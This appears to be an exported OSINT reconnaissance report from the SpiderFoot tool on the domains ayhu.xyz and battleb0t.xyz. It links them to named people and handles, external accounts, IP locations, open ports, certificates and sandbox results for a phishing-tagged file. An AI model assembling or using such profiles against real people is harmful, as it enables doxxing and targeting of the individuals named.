trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60726fad1912');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60726fad1912';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Flipboard (Category: tech)
https://flipboard.com/@ayhu | ayhu |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:64:DA:1A) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:32:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.20:443 | 188.114.97.0/24 |
| 2023-05-12 03:00:57 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.94): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:53:45 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: C1F8:9B05:D303FE:F3CF12:645CF509
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-gig2250041-GIG
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683813642.858818,VS0,VE273
Vary: Accept-Encoding
X-Fastly-Request-ID: df03515606cb10d86a4e0fd793a1bc65b6eaa2df
| 2606:50c0:8002::153 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Boingo Colubris (Net ID: 00:02:2D:0B:A5:B3) | 34.0544, -118.244 |
| 2023-05-12 02:53:20 | IP Address | No | Mnemonic PassiveDNS | 25 | 0 | 2 | 0 | None | 46.101.229.70 | kekw.battleb0t.xyz |
| 2023-05-12 03:11:19 | Physical Coordinates | No | AbstractAPI | 100 | 0 | 2 | 0 | None | 40.2024, 29.0398 | 87.248.157.102 |
| 2023-05-12 03:16:24 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | Amsterdam, North Holland, NH, Netherlands, NL | 188.114.97.1 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | logitec-a53131 (Net ID: 00:01:8E:A5:31:30) | 37.7813933,-122.3918002 |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5e4de1db49291f-ORD
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:D2:4D:0D) | 39.0469, -77.4903 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Revolut (Category: finance)
https://revolut.me/login | login |
| 2023-05-12 02:53:52 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 80B6:49F3:235A56C:358722C:645CDF0C
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-kigq8000067-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683808012.126331,VS0,VE23
Vary: Accept-Encoding
X-Fastly-Request-ID: 68f03409faf68cb6eb3782ac00da0088b30b8906
| 2606:50c0:8003::153 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | OpenBSD OpenSSH 7.4 | 87.248.157.102 |
| 2023-05-12 03:09:28 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | CN=acilacikveteriner.com | 87.248.157.102 |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.159): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:10:35 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.108.153:443 | 185.199.108.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CableWiFi (Net ID: 00:0D:67:47:D4:F4) | 32.8608, -79.9746 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:E4:40) | 50.1188, 8.6843 |
| 2023-05-12 02:55:00 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'MSG-993046.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3fc_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1020"\n "IsoScope_3fc_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_3fc_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_3fc_ConnHashTable<1020>_HashTable_Mutex"\n "IsoScope_3fc_IE_EarlyTabStart_0x9c4_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_3fc_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com"\n "getbootstrap.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "104.17.25.14:443"\n "172.67.30.148:443"\n "65.8.158.55:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1189.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1178.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1177.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00001020]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002584]\n "Tar1189.tmp" has type "data"- Location: [%TEMP%\\Tar1189.tmp]- [targetUID: 00000000-00002584]\n "HTTJFRWH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HTTJFRWH.txt]- [targetUID: 00000000-00001020]\n "_172C582D-B9D2-11ED-B010-08002708D069_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00001020]\n "search_2_.json" has type "JSON data"- [targetUID: 00000000-00001020]\n "52H103H9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\52H103H9.txt]- [targetUID: 00000000-00001020]\n "RYIH22IO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RYIH22IO.txt]- [targetUID: 00000000-00001020]\n "~DFD0DF213BBF0CD101.TMP" has type "data"- Location: [%TEMP%\\~DFD0DF213BBF0CD101.TMP]- [targetUID: 00000000-00001020]\n "Cab1177.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1177.tmp]- [targetUID: 00000000-00002584]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00001020]\n "floating-labels_1_.css" has type "ASCII text"- [targetUID: 00000000-00001020]\n "K4HM6RP3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\K4HM6RP3.txt]- [targetUID: 00000000-00001020]\n "Tar1178.tmp" has type "data"- Location: [%TEMP%\\Tar1178.tmp]- [targetUID: 00000000-00002584]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: 00000000-00001020]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00001020]\n "GXM745UA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GXM745UA.txt]- [targetUID: 00000000-00001020]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00001020]\n "core.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: 00000000-00001020]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001020]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /zepto.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zeptojs.com\nDNT: 1\nConnection: Keep-Alive"\n "}iwH+H0S/qyn[vT]I6PEF.H=D7"#O{u]nNgI_^)-rK\n8K2d/7N<q}4\nb}[4x(e)`Di%)e{OYoe_|*\'YF+fvTdD?\no|Q69wb!/$(97M^w7rdd,/qMrS>ud~U_{i.We{O~.^R=9nO8D|a3?%zZ&)9ql>O0Y{2uSVRd.(:4Ioa~\'iLONx].:gw?zD)u3q6(}}{yYz>=mSjay^O@XFrueeKM&W$.(XbqB|:{\'_>\n\\Zl#}oVD{/2\\\'%U{Fh*n\\e33ao3%5G\nT+x9,4ATdmRt~Xf5HQ4rQ,2,HROF|$5EgKoh%/&grNm"%!\n eE~K)n`lhPO?~|8("CE>r\\BOLZ4M_QDl},YSU{>5{IxTj\'\n4UYRUg+pFc5C<SaOpP]5=r>i=y$e?<_ae\\N.a-+:jJ%~fFn~7SQ%`fD01,k6ln-pDA|B]u\nA,E1@n9q:~EYGb^t*{EO[^]/#qtmu2O{|rDY!KQX_VOm?bXP2xG//O_l\'b?}DvVn3[Is.j$-MD\n|ryVWvHuT\'MyWE.]M?N6]j+Kuo*x$JS`", "zIbIJ*SdIo:>)&a0+\n\n\n%wX|1au&kdAMsFBz#E=>9Ik*|\'\\xM=Of3"#O^T[)gO;-=z|,~s~^--e=J$K.9+,#_%up%YVvh6N9gwFdR$]}}b}W1`tKm*n2~U#NQGj=dtDAbe-fVR5!jA^02\n;a0u&|HO#R:>vzY%6Mg%.WXO!*z,f!q,;\'A@ eT7#^<{\n9iM0D{Jk7?A$4\\_{riP&4K4$\n"2)V\n9UW7-8:W*,0!XyPWwN)@BVu2*yRarH*UO9MN|\nSPv5Q#I<2#T%$jgnr/a${NT`q=JQcc00C$\n:XMdb;<kf-TdL&F:]>OH\n\nxVOw^`FQwh{=5V$. a\'vbx&w\\nw?,loBn4Fm0i;hRQ[y+?]$W?77%5%>h#Ou\n\nje5`D#3ZUl4+22OO!\n3;:~3rq)VTM_v\\Q{sd2/.GaRCn0bea]0!\\%\n#HJA@N]\n=/RqqADMV(k@P,uX7mFHsa9B`2d>7d1lvPta75%QP;AJnX[q7];VlJ;P9%?{ATtK` f0qc^SSS33KakB=Sk,"\n "6uFRyl8xyC94{.>b$+hl "R4Qa$>+\\RzFz?|A!]9&4sd42P9\\nJ.p^~WjKN$Q~~@%4!Uk;LKdkbP9imKvlK+$RV;j=Zd< SkROuT_cAKi@r\nQ8(6R.4kE(oHK7CCMn TyQ<~\n~O[njWWvC2i9`igdP*kAQPc3F(\\)=)\n-p[nI]\\:sb:yV|\na :5T\'WgG+Gfj\nj71j28X+5` i;v&]|g\'Lyyp(.OSVdh4yVTXUx&v=$nlPDR a" 95@GA\nSp*\n.X3Km6x0[6ek)kX"Z0W8?Zs?64_Q(YER(Zp>]OU,#)_z<[\\![;34S[5+\'/p*1A_kU" :lrb^HXO3K9> Dn=VT\'TOd$IDLL7Y{a.R1a"q%\'A@uVh}n$AAM+/z5:RqaSR+?UFNaTQXNMl*?8`l3&!</i\'{.g^URVmquGy|hi1l4nc8[Sph]NV+-6v+yJ|BSC{t]u`mqu,ZoVp"Uv4pH%\nzdFV9NJl!</a~ICZOE$ul97;o)FZz:^{Y3d(\n=:hO`q\'&q3+OJ", "i$M/jD6:~QWk\n31X\'Pz:=tI}O V(#ol~[yjGMq7H_{~y9h`}r*\\\nqFWNGA]k%WQeby1P iYSDv44kOEl>j>~qRQ"sTnD2$yE*`764W,AM/deo~^[8o[6}+]%Dd7jAJH|B9xJ$Pi_u:D:,QD}gw?_aYO>MSnZ4Iuhp]awc1b"q)NU^ht{O\'1b_9*N6pj!EHJ}58RCiHk7|iJ\\0hVP]B^X.)5:hat^=-]\n;"%W*&zKJT-XsF[hMimjBTh3aZF?>v,#/u/R;|;x}SZFc@NWP/q}]gBn)JuCdV[_w&4\\"tk\'j^Yv\nnl&usOrk=4G78!o7%4;o(;ho\nrpjw<|xPj@9FcB*F44RH[O6@-a(CfYN#@KTPhCgg5l+\nEG*TbHW\'n[.Jw;=?$1p*[:f`@R\nOnUh-dM|Zb\\=&6q*":9fRJyi}&;&{F9eN:,~fdlQP%%Y5)iT!=M\\u8gj\n~azFM>UY/%HM4\'ZX}>apT|rQSwnl6}iQo&XZy)j<\nh$.yI*CS{kHb-oG89mWm\n3m<64[DN911jb]w>^x}7|[p"\n ":$V\nyrUJX&d+Q=CIkqs\n7FN/F02cXOcpALsD8h>o#=,$5&YEShDkTPX\nK$|D$vs.81bCDk|?!G/<*PyLP5YDi!UB9GJ^YEPLB!G8T3y#ed#\\/86&Qq~.*I 9|G9f:#3C3mq=GyLt=#T9~,>((A#oN"lXq*~y@YRi\nit7f;.lEvG+]v&- 7T9ZmwNTv`ij(~X".Od;\'0R2W3.I97u"NO4\n\nbGRnV1m\' C27^k"J%{h<AO0\nY|>.|a}NS)o4C8k\n57hZ5?*zGOj:3"qNS9rD:rwbX+y^\'5Z#-]q\n`c[LF}f.!F ExhVZy(l$y^IT~1gw.$SKKl1u|VgII9jUY^/I~U:y&YM_MU$A_X?f2&FSs9qA8<o{<!asBe6;{lyTt\\5zv8^ k\n@_QZ8f4IV[dmT_-Z }=y%~>v\\@YH&UE\n,:B9ji6f17;YOYr//NliJb6JdO@t)8Swd23Iu@+sjC9iV&T~iG>[+lUyF2|&2q#.Iu\\`^/ n\'a9nu!Q"8Qg/H%\nY\nI63j!T-2auX"`ODv`P2,H\\w"\n ">xoJ\nEFWMKc 8`{&+!jg<p5e{RS#^Lg&Sl1L,fRLUr#t8sdu64d<-CN\\yw|bavBQ@L*t4}-/h}Bg>\nsuiOaOwx(s#[2ui))^?4Kc}=!b0pgpzpBw)Waos"bOz\n4Y3^|z$X>{~I#U^\']\nBfowrt7[G\n-g>a#\nOFia|):&o2YypQ(?1g5\'Na;1GW7h{asC^S)i*bd5br;2p7epKL1i? o#aIkC\\w6\'&ECfjX;\'^=VNJ)N$X&"QQ)Z(Xs#\'z&Z/[F-%$;7^IG|"C*[WcnZllK.R5W~zcjE-SsZtUyO=w$yd7aL|y9>UN0w:$RwixC7Xxcw9DlMgaHVLddU:<7>kRMWXg8skw0)I"!@MG\nO^Q)L7q~h`9gOIp[oo7b;\'Poxi7NJBb oA~y"hCvW;41PA\\)\ny<=\nf//gO_sN6I*Q]Kpd^<}_|Kc^O6rJ`t^eQ1IsN\n7<LPgjpHg"bEy[!Zd#m | 185.199.109.153 |
| 2023-05-12 02:44:03 | Internet Name | No | SpiderFoot UI | 73 | 0 | 0 | 0 | None | ayhu.xyz | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.190): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5ad981cbd3140a-ORD
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.109 | 35.229.48.116 |
| 2023-05-12 02:47:30 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:88:80:c3:9c:e1:f5:05:d4:ce:eb:a7:b8:8b:96:69:16:e7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 13:22:33 2023 GMT
Not After : Jun 25 13:22:32 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:d7:3e:a0:44:3f:74:66:1e:5f:b3:2a:36:ad:
5d:f6:03:6b:7c:a2:a0:47:3a:fb:01:98:b1:8f:cc:
c2:91:5e:2e:be:9e:37:09:fc:a3:ca:c0:ce:59:08:
31:20:c4:42:4f:e2:31:60:c4:be:0d:a3:d0:7e:5f:
84:84:43:02:3b:79:0a:56:99:86:35:5f:ee:ec:21:
8b:06:16:ef:3b:0d:ec:b0:a6:01:ca:7c:9f:ae:0e:
21:80:e7:f6:f2:e9:02:7d:5d:df:7d:70:dd:dd:93:
90:c2:a3:7e:80:f6:ad:ed:f9:15:f2:c4:37:d6:ad:
4b:89:76:da:d5:eb:7c:ff:f8:44:95:84:d6:c3:19:
7b:70:37:49:42:e5:fe:7d:2c:bd:de:bc:2b:99:c0:
a4:9b:15:4f:d7:2f:f2:c7:b5:99:6b:e4:41:8f:a5:
3f:0f:85:1f:6c:4e:91:90:da:48:18:85:c0:a8:f9:
5b:43:e7:ba:4b:5b:17:69:9f:6a:26:1d:48:87:97:
a5:b7:a2:63:4f:58:3b:87:61:7a:53:e1:17:71:98:
3f:e6:14:b4:56:34:1d:a0:89:72:33:eb:2c:c5:36:
a0:27:b1:d2:f8:c6:e3:8f:79:67:b5:d6:8a:ec:f1:
bd:9b:ad:69:c1:3b:50:1a:84:e7:cb:cf:d0:71:43:
d2:3b:49:a5:27:2e:d1:3d:b9:18:82:02:4d:8f:b0:
bb:df:42:cf:64:aa:67:dc:2f:01:5a:31:2e:da:fb:
b2:d7:58:03:8e:aa:3f:4c:ca:46:eb:1f:d0:ce:c6:
8c:fe:3d:b8:0f:99:bb:cf:51:78:2e:f4:7a:df:b5:
ee:fc:f9:a7:d1:b7:2b:1b:c6:17:72:43:c6:34:57:
a1:d1:1d:f1:0c:8c:8a:f9:1d:27:7f:56:dc:e1:0f:
9b:fe:d2:eb:01:b7:80:25:0c:68:e6:38:d2:70:20:
00:db:75:51:f4:50:11:95:65:85:63:dc:a6:18:f5:
d8:1d:55:65:7b:fd:4b:42:c9:e0:e0:5b:99:47:62:
96:1e:29:13:2d:13:79:08:f1:19:4e:83:44:d1:b3:
1e:52:55:c8:85:91:ec:6f:74:02:73:b9:35:b5:4d:
32:70:2b:a5:40:65:f3:30:c9:2a:75:4a:fc:26:5e:
25:6b:0f:f0:6e:21:a9:a3:b3:fc:a9:24:00:c1:d2:
4b:2c:3d:0a:55:12:77:ec:d9:f9:b2:f1:bc:2c:ec:
53:cb:52:84:47:80:24:42:33:90:05:e1:7c:3a:b2:
37:ee:d5:9d:71:10:25:16:47:45:30:42:37:7d:df:
2f:44:a5:75:17:fd:0c:59:0a:14:5f:4a:c6:9e:57:
1c:e4:cb
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
EE:9A:7C:45:9F:8D:28:F8:82:DE:AE:58:A9:48:6F:F4:DA:ED:01:D8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Mar 27 14:22:33.221 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:4F:44:FF:23:78:0C:0A:43:E7:DD:21:00:
C4:D1:3F:C3:F1:0D:AC:F3:42:E5:53:7F:E9:12:DC:C9:
41:E7:31:AA:02:20:29:7B:10:84:21:42:A6:BE:66:D5:
B5:62:0E:26:B3:36:1B:B2:1F:F3:F6:F2:FA:99:68:0E:
07:72:EE:35:ED:D1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 27 14:22:33.315 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:42:E7:DB:8E:AD:39:D9:72:0F:22:03:49:
17:50:EA:AF:42:B9:A0:A7:C7:8A:2E:5E:9D:4B:70:15:
12:36:C9:8C:02:20:70:3E:22:0D:CB:C1:8E:23:7B:D4:
20:A7:55:2C:92:70:7B:00:76:E5:77:1A:32:2B:D4:BB:
A7:E5:BA:F4:CD:50
Signature Algorithm: sha256WithRSAEncryption
57:fc:9c:cc:34:05:33:b1:85:6f:05:be:91:2e:7e:dc:3a:5c:
d5:70:d3:bc:68:4c:e5:a6:0e:93:49:4c:b2:24:ea:22:6c:53:
1d:7b:22:13:3e:ae:d1:e9:17:1e:71:5b:5a:e3:c7:59:55:db:
f6:e5:0f:f7:75:49:45:9c:0b:d7:10:90:aa:9f:57:81:e1:bd:
95:72:69:1a:6a:68:d7:6f:63:d3:d0:c5:74:e1:f6:05:01:8e:
de:8a:f2:cc:6b:66:ed:6a:cf:b9:08:1c:41:e7:01:36:39:29:
3c:ce:b9:d5:71:4f:4a:e1:92:00:38:14:85:83:1b:78:d3:52:
4d:9c:dc:62:c1:ff:3e:c9:3b:f4:1b:55:62:89:22:10:52:f5:
2f:09:06:3f:72:98:2a:6c:4f:3e:41:69:f0:90:3d:75:67:0f:
5f:95:04:35:0b:5e:5e:d4:29:7e:f0:df:9c:7f:86:0a:bf:f4:
66:2a:ad:8c:e5:22:e0:2d:ff:f7:04:45:a4:bb:31:8c:99:a5:
16:da:1d:eb:c6:c4:fa:e4:70:84:9c:c6:93:f8:76:5a:3a:48:
95:d4:c6:4d:4c:36:eb:b7:e5:52:69:e6:7d:0f:b5:d1:ab:44:
b8:82:08:6c:6a:ef:3e:4f:de:99:6f:c7:4e:1e:39:17:26:6f:
a6:80:e5:c2
| battleb0t.xyz |
| 2023-05-12 02:55:15 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | OpenBSD OpenSSH 8.9p1 | 165.232.113.85 |
| 2023-05-12 03:00:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.54): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | S-lan (Net ID: 00:01:24:F1:91:41) | 37.7813933,-122.3918002 |
| 2023-05-12 02:47:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 34.148.97.127:80 | 34.148.97.127 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | cozyhome (Net ID: 00:06:25:B4:2A:03) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:03:2F:04:BB:BC) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:10:33 | Blacklisted IP Address | Yes | Threat Jammer | 0 | 1 | 3 | 0 | None | Threat Jammer - Risk score: 50 (MEDIUM)
